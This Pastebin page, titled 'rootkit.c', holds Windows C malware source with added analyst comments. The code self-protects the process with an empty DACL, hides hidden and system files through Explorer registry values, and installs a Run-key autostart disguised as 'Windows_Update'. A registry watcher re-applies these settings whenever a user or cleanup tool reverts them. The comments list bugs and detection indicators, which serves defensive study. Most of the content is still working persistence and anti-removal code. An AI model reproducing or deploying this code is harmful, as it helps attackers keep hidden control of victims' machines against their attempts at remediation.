rootkit.c

Jul 15th, 2023
950
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 2.74 KB | Cybersecurity | 0 0
  1. #include <windows.h>
  2. #include <aclapi.h>
  3. #include <sddl.h>
  4. #include <tchar.h>
  5.  
/*
 * Replace the DACL of the current process with the one described by the
 * SDDL string szSD, so that other user-mode code cannot open the process.
 *
 * Returns TRUE when both the SDDL conversion and the security update
 * succeed, FALSE otherwise.
 *
 * Analyst notes:
 *  - Only "D:P" is ever passed to the converter: the two TEXT(...) lines
 *    after the initialisation are expression statements with no effect,
 *    so the ACE strings "(D;OICI;GA;;;BG)" and "(D;OICI;GA;;;AN)" never
 *    reach the descriptor. "D:P" alone is a protected DACL with no ACEs,
 *    i.e. no access is granted to anyone by the DACL.
 *  - The OpenProcess result is not checked and the handle is never closed;
 *    the converted descriptor (allocated by the API) is never freed.
 *  - A process that tightens its own DACL this way is still observable
 *    by callers holding privileges that bypass DACL checks (e.g. a
 *    SeDebugPrivilege holder), so this is a tell rather than a barrier;
 *    a user-mode process whose DACL denies PROCESS_QUERY_* to its own
 *    owner is itself a useful detection signal.
 */
_Bool SelfDefense()
{
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, GetCurrentProcessId());
    SECURITY_ATTRIBUTES sa;
    TCHAR * szSD = TEXT("D:P");
    TEXT("(D;OICI;GA;;;BG)");   /* no effect: discarded literal */
    TEXT("(D;OICI;GA;;;AN)");   /* no effect: discarded literal */

    sa.nLength = sizeof(SECURITY_ATTRIBUTES);
    sa.bInheritHandle = FALSE;
    /* Build a self-relative SECURITY_DESCRIPTOR from "D:P" (empty protected DACL). */
    if (!ConvertStringSecurityDescriptorToSecurityDescriptor(szSD, SDDL_REVISION_1, &(sa.lpSecurityDescriptor), NULL))
        return FALSE;
    /* Apply only the DACL portion to the process object. */
    if (!SetKernelObjectSecurity(hProcess, DACL_SECURITY_INFORMATION, sa.lpSecurityDescriptor))
        return FALSE;
    return TRUE;
}
  22.  
/*
 * Write two Explorer view settings under
 * HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced:
 * "Hidden" = 2 and "ShowSuperHidden" = 0 (both REG_DWORD).
 *
 * Analyst notes:
 *  - These values control whether Explorer displays hidden and
 *    protected-OS files; the combination written here corresponds to the
 *    "do not show" settings, so files flagged hidden/system stay out of
 *    view. Monitoring writes to these two values is a cheap detection.
 *  - RegOpenKey results are not checked; on failure RegSetValueEx is
 *    called with an uninitialised key handle.
 *  - The size argument is sizeof(a), i.e. the size of a char pointer
 *    (4 or 8 bytes depending on build), not the size of the int being
 *    written, so the stored data is not a well-formed 4-byte DWORD on
 *    64-bit builds. Whether Explorer honours such a value is not
 *    determined by this code — TODO confirm when analysing a live sample.
 *  - The same key is opened and closed twice; a single open would
 *    suffice, which suggests copy-paste construction.
 */
void hideFiles() {
    HKEY newValue;
   
    RegOpenKey(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", &newValue);
    int n = 2;
    char* a = (char*)&n;
    /* NOTE: sizeof(a) is the pointer size, not sizeof(n). */
    RegSetValueEx(newValue, "Hidden", 0, REG_DWORD, a, sizeof(a));
    RegCloseKey(newValue);

    RegOpenKey(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", &newValue);
    n = 0;
    a = (char*)&n;
    /* Same pointer-size issue as above. */
    RegSetValueEx(newValue, "ShowSuperHidden", 0, REG_DWORD, a, sizeof(a));
    RegCloseKey(newValue);
}
  38.  
/*
 * (Re)create a Run-key persistence entry by shelling out to REG.EXE:
 * HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, value "Windows_Update",
 * pointing at %APPDATA%\Windows_Update\winupdt.exe. /F overwrites silently.
 *
 * Analyst notes:
 *  - system() launches cmd.exe, which in turn launches reg.exe; the
 *    resulting process tree (parent -> cmd.exe -> reg.exe with a "REG ADD
 *    ... \Run" command line) is a high-signal detection opportunity, as is
 *    any write to the HKCU Run key naming a file under %APPDATA%.
 *  - %APPDATA% is expanded by cmd.exe at run time, not by this program.
 *  - The return value of system() is ignored, so failure is never noticed.
 *  - Value name "Windows_Update" and path "Windows_Update\winupdt.exe" are
 *    the indicators this sample uses; note that the path imitates a
 *    legitimate component name.
 */
void fixStartup() {
    system("REG ADD HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Windows_Update /t REG_SZ /F /D %APPDATA%\\Windows_Update\\winupdt.exe");
}
  42.  
/*
 * Block on change notifications for the HKCU subkey named by `watch` and,
 * on every change, re-apply one of the two settings functions:
 * watchType != 0 -> hideFiles(), watchType == 0 -> fixStartup().
 *
 * Parameters:
 *   watch      - subkey path relative to HKEY_CURRENT_USER, opened with
 *                KEY_NOTIFY only.
 *   watchType  - selects which re-apply routine runs after a change.
 *
 * Analyst notes:
 *  - This is the "undo the user's cleanup" loop: whenever someone (or a
 *    remediation script) changes the watched key, the value is put back.
 *    A process that holds a KEY_NOTIFY handle on the Run key or the
 *    Explorer\Advanced key and writes to it immediately after every
 *    change is a strong behavioural indicator.
 *  - After handling a change the function calls itself recursively
 *    instead of re-arming the notification. Each recursion opens a new
 *    key handle and a new event that are never closed, so handles and
 *    stack frames grow without bound for the life of the process.
 *  - The RegCloseKey/CloseHandle cleanup after the while loop is
 *    unreachable: the loop only exits via return.
 *  - Errors are printed with _tprintf and the function simply returns,
 *    leaving hKey (and, later, hEvent) open.
 *  - RegNotifyChangeKeyValue is armed with bWatchSubtree = TRUE and
 *    fAsynchronous = TRUE; the notification is one-shot, which is why the
 *    code re-enters WatchReg after each wake-up.
 */
void WatchReg(char *watch, _Bool watchType)
{
    /* Fire on name, attribute, last-write and security changes anywhere under the key. */
    DWORD  dwFilter =   REG_NOTIFY_CHANGE_NAME          |
                        REG_NOTIFY_CHANGE_ATTRIBUTES    |
                        REG_NOTIFY_CHANGE_LAST_SET      |
                        REG_NOTIFY_CHANGE_SECURITY;

    HANDLE hEvent;
    HKEY   hMainKey;
    HKEY   hKey;
    LONG   lErrorCode;

    hMainKey = HKEY_CURRENT_USER;

    /* KEY_NOTIFY is the minimum right needed for RegNotifyChangeKeyValue. */
    lErrorCode = RegOpenKeyEx(hMainKey, watch, 0, KEY_NOTIFY, &hKey);
    if (lErrorCode != ERROR_SUCCESS)
    {
        _tprintf(TEXT("Error in RegOpenKeyEx (%d).\n"), lErrorCode);
        return;
    }

    /* Manual-reset event, initially non-signalled; signalled once per change. */
    hEvent = CreateEvent(NULL, TRUE, FALSE, NULL);
    if (hEvent == NULL)
    {
        _tprintf(TEXT("Error in CreateEvent (%d).\n"), GetLastError());
        return;   /* hKey leaks here */
    }

    /* Asynchronous one-shot registration: the event is signalled on the next change. */
    lErrorCode = RegNotifyChangeKeyValue(hKey, TRUE, dwFilter, hEvent, TRUE);
    if (lErrorCode != ERROR_SUCCESS)
    {
        _tprintf(TEXT("Error in RegNotifyChangeKeyValue (%d).\n"), lErrorCode);
        return;   /* hKey and hEvent leak here */
    }

    while(1 > 0) {   /* infinite loop; exits only via return */
        if (WaitForSingleObject(hEvent, INFINITE) == WAIT_FAILED)
        {
            _tprintf(TEXT("Error in WaitForSingleObject (%d).\n"), GetLastError());
            return;
        }
        else
        {
            /* Re-apply the setting that the change may have undone. */
            if (watchType)
                hideFiles();
            else
                fixStartup();

            /* Recursive re-entry: opens a fresh key + event on every change,
             * never returning to close the ones held by this frame. */
            WatchReg(watch, watchType);
        }
    }

    /* --- unreachable from here on: the loop above never falls through --- */
    lErrorCode = RegCloseKey(hKey);
    if (lErrorCode != ERROR_SUCCESS)
    {
        _tprintf(TEXT("Error in RegCloseKey (%d).\n"), GetLastError());
        return;
    }

    if (!CloseHandle(hEvent))
    {
        _tprintf(TEXT("Error in CloseHandle.\n"));
        return;
    }
}